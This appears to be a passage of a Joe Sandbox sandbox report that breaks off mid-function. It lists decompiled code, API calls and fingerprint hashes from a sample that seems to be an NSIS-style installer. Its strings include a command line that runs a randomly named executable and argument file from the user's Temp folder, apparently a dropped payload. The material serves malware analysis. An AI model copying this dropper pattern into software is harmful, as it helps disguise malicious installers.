                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                                  • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                  • Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
                                  • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				long _v16;
                                  				long _v20;
                                  				long _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				long _v36;
                                  				char _v40;
                                  				unsigned int _v44;
                                  				signed int _v48;
                                  				WCHAR* _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				WCHAR* _v72;
                                  				void _v76;
                                  				struct HWND__* _v80;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t82;
                                  				long _t87;
                                  				short* _t89;
                                  				void* _t95;
                                  				signed int _t96;
                                  				int _t109;
                                  				signed short _t114;
                                  				signed int _t118;
                                  				struct HWND__** _t122;
                                  				intOrPtr* _t138;
                                  				WCHAR* _t146;
                                  				unsigned int _t150;
                                  				signed int _t152;
                                  				unsigned int _t156;
                                  				signed int _t158;
                                  				signed int* _t159;
                                  				signed int* _t160;
                                  				struct HWND__* _t166;
                                  				struct HWND__* _t167;
                                  				int _t169;
                                  				unsigned int _t197;
                                  
                                  				_t156 = __edx;
                                  				_t82 =  *0x4226e0;
                                  				_v32 = _t82;
                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                  				if(_a8 == 0x40b) {
                                  					E00405B4B(0x3fb, _t146);
                                  					E0040678E(_t146);
                                  				}
                                  				_t167 = _a4;
                                  				if(_a8 != 0x110) {
                                  					L8:
                                  					if(_a8 != 0x111) {
                                  						L20:
                                  						if(_a8 == 0x40f) {
                                  							L22:
                                  							_v8 = _v8 & 0x00000000;
                                  							_v12 = _v12 & 0x00000000;
                                  							E00405B4B(0x3fb, _t146);
                                  							if(E00405EDE(_t186, _t146) == 0) {
                                  								_v8 = 1;
                                  							}
                                  							E00406507(0x4216d8, _t146);
                                  							_t87 = E004068D4(1);
                                  							_v16 = _t87;
                                  							if(_t87 == 0) {
                                  								L30:
                                  								E00406507(0x4216d8, _t146);
                                  								_t89 = E00405E81(0x4216d8);
                                  								_t158 = 0;
                                  								if(_t89 != 0) {
                                  									 *_t89 = 0;
                                  								}
                                  								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                  									goto L35;
                                  								} else {
                                  									_t169 = 0x400;
                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                  									asm("cdq");
                                  									_v48 = _t109;
                                  									_v44 = _t156;
                                  									_v12 = 1;
                                  									goto L36;
                                  								}
                                  							} else {
                                  								_t159 = 0;
                                  								if(0 == 0x4216d8) {
                                  									goto L30;
                                  								} else {
                                  									goto L26;
                                  								}
                                  								while(1) {
                                  									L26:
                                  									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
                                  									if(_t114 != 0) {
                                  										break;
                                  									}
                                  									if(_t159 != 0) {
                                  										 *_t159 =  *_t159 & _t114;
                                  									}
                                  									_t160 = E00405E22(0x4216d8);
                                  									 *_t160 =  *_t160 & 0x00000000;
                                  									_t159 = _t160;
                                  									 *_t159 = 0x5c;
                                  									if(_t159 != 0x4216d8) {
                                  										continue;
                                  									} else {
                                  										goto L30;
                                  									}
                                  								}
                                  								_t150 = _v44;
                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                  								_v44 = _t150 >> 0xa;
                                  								_v12 = 1;
                                  								_t158 = 0;
                                  								__eflags = 0;
                                  								L35:
                                  								_t169 = 0x400;
                                  								L36:
                                  								_t95 = E00404DF1(5);
                                  								if(_v12 != _t158) {
                                  									_t197 = _v44;
                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                  										_v8 = 2;
                                  									}
                                  								}
                                  								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
                                  									E00404DD9(0x3ff, 0xfffffffb, _t95);
                                  									if(_v12 == _t158) {
                                  										SetDlgItemTextW(_a4, _t169, 0x4216c8);
                                  									} else {
                                  										E00404D10(_t169, 0xfffffffc, _v48, _v44);
                                  									}
                                  								}
                                  								_t96 = _v8;
                                  								 *0x42a2c4 = _t96;
                                  								if(_t96 == _t158) {
                                  									_v8 = E0040140B(7);
                                  								}
                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                  									_v8 = _t158;
                                  								}
                                  								E00404485(0 | _v8 == _t158);
                                  								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
                                  									E004048AD();
                                  								}
                                  								 *0x4236f8 = _t158;
                                  								goto L53;
                                  							}
                                  						}
                                  						_t186 = _a8 - 0x405;
                                  						if(_a8 != 0x405) {
                                  							goto L53;
                                  						}
                                  						goto L22;
                                  					}
                                  					_t118 = _a12 & 0x0000ffff;
                                  					if(_t118 != 0x3fb) {
                                  						L12:
                                  						if(_t118 == 0x3e9) {
                                  							_t152 = 7;
                                  							memset( &_v76, 0, _t152 << 2);
                                  							_v80 = _t167;
                                  							_v72 = 0x423708;
                                  							_v60 = E00404CAA;
                                  							_v56 = _t146;
                                  							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
                                  							_t122 =  &_v80;
                                  							_v64 = 0x41;
                                  							__imp__SHBrowseForFolderW(_t122);
                                  							if(_t122 == 0) {
                                  								_a8 = 0x40f;
                                  							} else {
                                  								__imp__CoTaskMemFree(_t122);
                                  								E00405DD6(_t146);
                                  								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
                                  								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                  									E00406544(_t146, 0x423708, _t167, 0, _t125);
                                  									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
                                  										lstrcatW(_t146, 0x4281c0);
                                  									}
                                  								}
                                  								 *0x4236f8 =  *0x4236f8 + 1;
                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                  							}
                                  						}
                                  						goto L20;
                                  					}
                                  					if(_a12 >> 0x10 != 0x300) {
                                  						goto L53;
                                  					}
                                  					_a8 = 0x40f;
                                  					goto L12;
                                  				} else {
                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                  					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
                                  						E00405DD6(_t146);
                                  					}
                                  					 *0x4291f8 = _t167;
                                  					SetWindowTextW(_t166, _t146);
                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                  					_push(1);
                                  					E00404463(_t167);
                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                  					_push(0x14);
                                  					E00404463(_t167);
                                  					E00404498(_t166);
                                  					_t138 = E004068D4(8);
                                  					if(_t138 == 0) {
                                  						L53:
                                  						return E004044CA(_a8, _a12, _a16);
                                  					} else {
                                  						 *_t138(_t166, 1);
                                  						goto L8;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetDlgItem.USER32 ref: 004049A3
                                  • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                  • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00423708,00000000,?,?), ref: 00404ABB
                                  • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj), ref: 00404AC7
                                  • SetDlgItemTextW.USER32 ref: 00404AD9
                                    • Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                    • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                    • Part of subcall function 0040678E: CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                  • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                    • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                    • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                    • Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 2624150263-1176606499
                                  • Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                                  • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                  • Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
                                  • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004021AA() {
                                  				signed int _t52;
                                  				void* _t56;
                                  				intOrPtr* _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr* _t62;
                                  				intOrPtr* _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t68;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t72;
                                  				intOrPtr* _t74;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				void* _t83;
                                  				intOrPtr* _t91;
                                  				signed int _t101;
                                  				signed int _t105;
                                  				void* _t107;
                                  
                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                  				_t52 =  *(_t107 - 0x20);
                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                  				_t101 = _t52 & 0x00008000;
                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                  				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                  					E00402DA6(0x21);
                                  				}
                                  				_t56 = _t107 + 8;
                                  				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                  				if(_t56 < _t83) {
                                  					L14:
                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                  					_push(0xfffffff0);
                                  				} else {
                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                  					if(_t61 >= _t83) {
                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                  						if(_t101 == _t83) {
                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                                  						}
                                  						if(_t105 != _t83) {
                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                  						}
                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                  						if( *_t91 != _t83) {
                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                  						}
                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                  						}
                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                  					}
                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                  						_push(0xfffffff4);
                                  					} else {
                                  						goto L14;
                                  					}
                                  				}
                                  				E00401423();
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
                                  				return 0;
                                  			}

                                  APIs
                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID:
                                  • API String ID: 542301482-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E0040290B(short __ebx, short* __edi) {
                                  				void* _t21;
                                  
                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                  					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                  					_push(_t21 - 0x2b0);
                                  					_push(__edi);
                                  					E00406507();
                                  				} else {
                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                  					 *__edi = __ebx;
                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                  				}
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
                                  				return 0;
                                  			}





                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00404ED0(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				long _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				signed char* _v32;
                                  				int _v36;
                                  				signed int _v44;
                                  				int _v48;
                                  				signed int* _v60;
                                  				signed char* _v64;
                                  				signed int _v68;
                                  				long _v72;
                                  				void* _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				void* _v88;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t198;
                                  				intOrPtr _t201;
                                  				long _t207;
                                  				signed int _t211;
                                  				signed int _t222;
                                  				void* _t225;
                                  				void* _t226;
                                  				int _t232;
                                  				long _t237;
                                  				long _t238;
                                  				signed int _t239;
                                  				signed int _t245;
                                  				signed int _t247;
                                  				signed char _t248;
                                  				signed char _t254;
                                  				void* _t258;
                                  				void* _t260;
                                  				signed char* _t278;
                                  				signed char _t279;
                                  				long _t284;
                                  				struct HWND__* _t291;
                                  				signed int* _t292;
                                  				int _t293;
                                  				long _t294;
                                  				signed int _t295;
                                  				void* _t297;
                                  				long _t298;
                                  				int _t299;
                                  				signed int _t300;
                                  				signed int _t303;
                                  				signed int _t311;
                                  				signed char* _t319;
                                  				int _t324;
                                  				void* _t326;
                                  
                                  				_t291 = _a4;
                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                  				_v8 = GetDlgItem(_t291, 0x408);
                                  				_t326 = SendMessageW;
                                  				_v24 =  *0x42a248;
                                  				_v28 =  *0x42a230 + 0x94;
                                  				if(_a8 != 0x110) {
                                  					L23:
                                  					if(_a8 != 0x405) {
                                  						_t301 = _a16;
                                  					} else {
                                  						_a12 = 0;
                                  						_t301 = 1;
                                  						_a8 = 0x40f;
                                  						_a16 = 1;
                                  					}
                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                  						_v16 = _t301;
                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                  							if(( *0x42a239 & 0x00000002) != 0) {
                                  								L41:
                                  								if(_v16 != 0) {
                                  									_t237 = _v16;
                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                  									}
                                  									_t238 = _v16;
                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                  										_t301 = _v24;
                                  										_t239 =  *(_t238 + 0x5c);
                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                  										} else {
                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                  										}
                                  									}
                                  								}
                                  								goto L48;
                                  							}
                                  							if(_a8 == 0x413) {
                                  								L33:
                                  								_t301 = 0 | _a8 != 0x00000413;
                                  								_t245 = E00404E1E(_v8, _a8 != 0x413);
                                  								_t295 = _t245;
                                  								if(_t295 >= 0) {
                                  									_t94 = _v24 + 8; // 0x8
                                  									_t301 = _t245 * 0x818 + _t94;
                                  									_t247 =  *_t301;
                                  									if((_t247 & 0x00000010) == 0) {
                                  										if((_t247 & 0x00000040) == 0) {
                                  											_t248 = _t247 ^ 0x00000001;
                                  										} else {
                                  											_t254 = _t247 ^ 0x00000080;
                                  											if(_t254 >= 0) {
                                  												_t248 = _t254 & 0x000000fe;
                                  											} else {
                                  												_t248 = _t254 | 0x00000001;
                                  											}
                                  										}
                                  										 *_t301 = _t248;
                                  										E0040117D(_t295);
                                  										_a12 = _t295 + 1;
                                  										_a16 =  !( *0x42a238) >> 0x00000008 & 0x00000001;
                                  										_a8 = 0x40f;
                                  									}
                                  								}
                                  								goto L41;
                                  							}
                                  							_t301 = _a16;
                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                  								goto L41;
                                  							}
                                  							goto L33;
                                  						} else {
                                  							goto L48;
                                  						}
                                  					} else {
                                  						L48:
                                  						if(_a8 != 0x111) {
                                  							L56:
                                  							if(_a8 == 0x200) {
                                  								SendMessageW(_v8, 0x200, 0, 0);
                                  							}
                                  							if(_a8 == 0x40b) {
                                  								_t225 =  *0x4236ec;
                                  								if(_t225 != 0) {
                                  									ImageList_Destroy(_t225);
                                  								}
                                  								_t226 =  *0x423700;
                                  								if(_t226 != 0) {
                                  									GlobalFree(_t226);
                                  								}
                                  								 *0x4236ec = 0;
                                  								 *0x423700 = 0;
                                  								 *0x42a280 = 0;
                                  							}
                                  							if(_a8 != 0x40f) {
                                  								L90:
                                  								if(_a8 == 0x420 && ( *0x42a239 & 0x00000001) != 0) {
                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                  									ShowWindow(_v8, _t324);
                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                  								}
                                  								goto L93;
                                  							} else {
                                  								E004011EF(_t301, 0, 0);
                                  								_t198 = _a12;
                                  								if(_t198 != 0) {
                                  									if(_t198 != 0xffffffff) {
                                  										_t198 = _t198 - 1;
                                  									}
                                  									_push(_t198);
                                  									_push(8);
                                  									E00404E9E();
                                  								}
                                  								if(_a16 == 0) {
                                  									L75:
                                  									E004011EF(_t301, 0, 0);
                                  									_v36 =  *0x423700;
                                  									_t201 =  *0x42a248;
                                  									_v64 = 0xf030;
                                  									_v24 = 0;
                                  									if( *0x42a24c <= 0) {
                                  										L86:
                                  										if( *0x42a2de == 0x400) {
                                  											InvalidateRect(_v8, 0, 1);
                                  										}
                                  										if( *((intOrPtr*)( *0x4291fc + 0x10)) != 0) {
                                  											E00404DD9(0x3ff, 0xfffffffb, E00404DF1(5));
                                  										}
                                  										goto L90;
                                  									}
                                  									_t292 = _t201 + 8;
                                  									do {
                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                  										if(_t207 != 0) {
                                  											_t303 =  *_t292;
                                  											_v72 = _t207;
                                  											_v76 = 8;
                                  											if((_t303 & 0x00000001) != 0) {
                                  												_v76 = 9;
                                  												_v60 =  &(_t292[4]);
                                  												_t292[0] = _t292[0] & 0x000000fe;
                                  											}
                                  											if((_t303 & 0x00000040) == 0) {
                                  												_t211 = (_t303 & 0x00000001) + 1;
                                  												if((_t303 & 0x00000010) != 0) {
                                  													_t211 = _t211 + 3;
                                  												}
                                  											} else {
                                  												_t211 = 3;
                                  											}
                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                  										}
                                  										_v24 = _v24 + 1;
                                  										_t292 =  &(_t292[0x206]);
                                  									} while (_v24 <  *0x42a24c);
                                  									goto L86;
                                  								} else {
                                  									_t293 = E004012E2( *0x423700);
                                  									E00401299(_t293);
                                  									_t222 = 0;
                                  									_t301 = 0;
                                  									if(_t293 <= 0) {
                                  										L74:
                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                  										_a16 = _t293;
                                  										_a8 = 0x420;
                                  										goto L75;
                                  									} else {
                                  										goto L71;
                                  									}
                                  									do {
                                  										L71:
                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                  											_t301 = _t301 + 1;
                                  										}
                                  										_t222 = _t222 + 1;
                                  									} while (_t222 < _t293);
                                  									goto L74;
                                  								}
                                  							}
                                  						}
                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                  							goto L93;
                                  						} else {
                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                  							if(_t232 == 0xffffffff) {
                                  								goto L93;
                                  							}
                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                  								_t294 = 0x20;
                                  							}
                                  							E00401299(_t294);
                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                  							_a12 = _a12 | 0xffffffff;
                                  							_a16 = 0;
                                  							_a8 = 0x40f;
                                  							goto L56;
                                  						}
                                  					}
                                  				} else {
                                  					_v36 = 0;
                                  					_v20 = 2;
                                  					 *0x42a280 = _t291;
                                  					 *0x423700 = GlobalAlloc(0x40,  *0x42a24c << 2);
                                  					_t258 = LoadImageW( *0x42a220, 0x6e, 0, 0, 0, 0);
                                  					 *0x4236f4 =  *0x4236f4 | 0xffffffff;
                                  					_t297 = _t258;
                                  					 *0x4236fc = SetWindowLongW(_v8, 0xfffffffc, E004054DD);
                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                  					 *0x4236ec = _t260;
                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                  					SendMessageW(_v8, 0x1109, 2,  *0x4236ec);
                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                  					}
                                  					DeleteObject(_t297);
                                  					_t298 = 0;
                                  					do {
                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
